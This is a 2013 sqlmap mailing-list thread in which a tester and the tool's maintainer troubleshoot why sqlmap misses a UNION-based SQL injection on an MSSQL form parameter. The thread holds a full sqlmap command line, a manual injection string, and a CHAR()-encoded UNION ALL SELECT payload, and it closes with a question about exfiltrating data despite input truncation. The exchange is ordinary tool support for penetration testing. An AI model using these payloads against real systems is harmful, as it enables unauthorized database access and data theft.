Hi,
After trying to figure out exactly what's going on, it looks like the input
ParameterOne is truncated to 167 characters. It's a blackbox test so I'm
not sure how it's producing valid SQL, but I guess my next question is, if
an input size is constrained like this, does sqlmap have a mechanism for
still working?
As long as database/table/field names aren't amazing long, it should be
possible for sqmap to exfil data, right?
Thanks,
Stephen
On Wed, Jun 5, 2013 at 9:56 AM, Miroslav Stampar <miroslav.stam...@gmail.com
> wrote:
> Hi.
>
> That site is trimming results (seems to do it to 14 chars in length).
>
> For example, request [#32]:
>
> ParamterOne=-4230' UNION ALL SELECT
> NULL,NULL,CHAR(58)+CHAR(106)+CHAR(117)+CHAR(103)+CHAR(58)+CHAR(75)+CHAR(108)+CHAR(101)+CHAR(113)+CHAR(75)+CHAR(89)+CHAR(67)+CHAR(120)+CHAR(113)+CHAR(116)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(114)+CHAR(58)--
> &ParameterTwo=10,11,12,35,61
>
> can be decoded to:
>
> ParamterOne=-4230' UNION ALL SELECT NULL,NULL,*:jug:KleqKYCxqt:hor:*--
> &ParameterTwo=10,11,12,35,61
>
> while in response there is:
> :jug:KleqKYCxq
>
> In this kind of cases you'll need to (at least try to) exploit it manually.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Tue, Jun 4, 2013 at 10:47 AM, Stephen Shkardoon <s...@ss23.geek.nz>wrote:
>
>> I have a case that sqlmap seems to be acting weird about. I've ran a
>> 'sqlmap.py -u "myhost.com/TestFile.aspx"
>> --data="ParameterOne=d&ParameterTwo=10,11,12,35,61" --dbms=mssql --hostname
>> --technique=U --union-cols=3 -v 6 --flush-session --fresh-queries -t
>> traffic_log.txt'
>> Manually injecting with ParameterOne looking like "foo' UNION SELECT
>> 1,2,3 -- " works as expected. In fact, in the log, you can see it working
>> fine in the case of request #32 and #36. However, sqlmap doesn't "find"
>> this issue. Most of the queries seem to be doing something like "foo)
>> UNION" instead.
>> Is there a problem on my end here, or is sqlmap doing something weird or
>> what?
>>
>> Running sqlmap/1.0-dev-3e0f747 (latest git).
>>
>> Thanks,
>> Stephen
>>
>>
>> ------------------------------------------------------------------------------
>> How ServiceNow helps IT people transform IT departments:
>> 1. A cloud service to automate IT design, transition and operations
>> 2. Dashboards that offer high-level views of enterprise services
>> 3. A single system of record for all IT processes
>> http://p.sf.net/sfu/servicenow-d2d-j
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
------------------------------------------------------------------------------
This SF.net email is sponsored by Windows:
Build for Windows Store.
http://p.sf.net/sfu/windows-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
